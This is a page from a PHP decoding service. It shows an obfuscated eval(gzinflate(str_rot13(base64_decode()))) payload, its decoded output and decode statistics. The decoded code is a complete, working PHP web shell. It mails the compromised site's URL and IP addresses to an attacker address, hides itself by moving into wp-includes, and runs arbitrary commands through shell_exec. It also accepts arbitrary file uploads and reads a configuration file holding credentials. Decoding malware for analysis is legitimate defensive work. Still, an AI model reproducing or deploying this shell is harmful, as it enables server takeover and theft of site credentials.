Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('vUl6QttVEP58Vf0Py17UtUhj4KqTKsAIUZw20pFjVrgv..
Decoded Output download
<?php @ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE = OFF";
} else {
$security = "SAFE_MODE = ON";
};
$df = 'ini_get disable!';
$serper = gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body", "Shell Result http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
mail("[email protected]", "$body", "Shell Result http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
} else {
$_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/wp-info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE : OFF";
} else {
$security = "SAFE_MODE : ON";
}
echo "<title>Peterson - Shell</title><br><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";
$df = 'ini_get disable!';
if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) {
echo "NONE";
} else {
echo "$df";
}
function pwd() {
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
};
} elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if (isset($_POST['submit'])) {
$uploaddir = pwd();
if (!$name = $_POST['newname']) {
$name = $_FILES['userfile']['name'];
};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
echo "Upload Failed";
} else {
echo "Upload Success to " . $uploaddir . $name . " :D ";
}
}
if (isset($_POST['command'])) {
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
} else {
echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
}
if (isset($_GET['baca'])) {
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
Did this file decode correctly?
Original Code
<?php eval(gzinflate(str_rot13(base64_decode('vUl6QttVEP58Vf0Py17UtUhj4KqTKsAIUZw20pFjVrgvgCzH3pAF23hs16Qc4r/fzK6dl6Zj9EddBIqz8/bMzLMzPhG5CFiutCy5UBOholbKw3aVx03IXET38N2WmBJ0WyjFtdMKVMF11Bv0r9gkuovu2Y3r/vL0Yav1IJTQsaxlWnyyB1OtOZ/AIxoM/wqGSvTLa3wRfhmMxvQGxSK/WxMPgz8vg9E4vBz2rMJRJo+gTlQznqakl9/xGECS6xw9ozlSLRVabLaXY9A8wUdhASTDwzCTCXQL+AtSlzy1FI+rRehU9H7aDcLzTicAB4Nhlx4+v9viqeKvdfVOCVAnRp/VIQmpK7fNDCheFrz0TjCTV0Ie8yjjziJIc7/D00F0CPWri8HvMTufvHE0DM4H42DFKItR6tCCeF4mKb/lbGUSydSLclNqCDXlozto9YZcSKkmM62Lg2m7KSCUssnxOu9dkBEvHzhvqBO4zgmcNpWH4wYmXcZCPICbFVfm+x9CcaVGKe//PwybZ6zZt+zihsaHD6Z9b+o0lP4cjK9LnMqcI52RzVdJcsxK+clTdMPexTjs9v4I+qfnATMcWuDiCOIvtTqDs8vzoD8Oh4PBmN1rtD0vaVIepxWo2uep9IpMgeQtue2xjbZQrDvXwv+JzD5rE7MPLLNOKZ5WT4+00Ck/vkB+TmrJLjF6PHfb86NWdv4xj9pgKuHyK/E3938jsVmhW79+Mh9DPKbeIqpUj9qThWQLDsMKmu1Gh22QcQgHQxl6Dh3Xo+5bcFyCAaREicQ3nrJUawQPixAeJbdY4e23wkhLYoqH7YOAFBsaSaaZ7o+76djRTrrN0FKXhy+PF2CuZtJZ6JB/FVcrp0RyrljevycOcL7voI8lajaGO+gC3S3E/qAfQPeRIPUJGBs6NOqkmFC9CF6Pa57YVhXjkYXUqnyly7KQyk75DngzZpeMdRtyKc+NyN3dVE7JaEjmBEI8Q2Ho+bRlYS53ff69ENfXPxIDtF8ORQfCzBm0q8xVhoMYyGWBK4tRpgY+pcevN/NZc0yUJw0HjlFeR5rox4L7R/OvmhKkiULjLKHr0kQ1ycRFYf1D8hCllfl9D/p6UWnMDteRZXWQZJHBgBVSR3ejt5tROneQN+lgNv+SwnKRyighXZFlk1MbtTeymYkk4WyNSUzseApGsK/Fa73wJ61wfrLeXlLR52ZwfUBJTqz4x3dN6/3f6zg5n+MDJWQaKeXrdc3AgqxyZ6IXtbUJr5Vqcjtgxa6YNWH2UHIsEoGLqkvege2WwdHY1GPA6MkIzD7BBTK6b1pW2A3oGSXDw1k+8NBt51aICs5qWmdJhNYM1sYCjXTC1GB+iivM1o6DhhWw9WyCo+2Z2HpP1uSjKo65RVHDkfetO5i/Bx2YeuTZ3LaNItekYqoMasSUrBZziUy69VUtV77KoI8Ng/bMB/aNwmgF45HHDm0yg9mSqI22Z/UtgfwHpyxIcTeN2AuON98wJkQcLUWT+RRlwx6Ec+eBPew8BSvQeMMfysV6SFNras37gtukYXkxxj8=')))); ?>
Function Calls
base64_decode | 1 |
gzinflate | 1 |
str_rot13 | 1 |
Stats
MD5 | 989784f552ed894f67b7691487375a37 |
Eval Count | 1 |
Decode Time | 93 ms |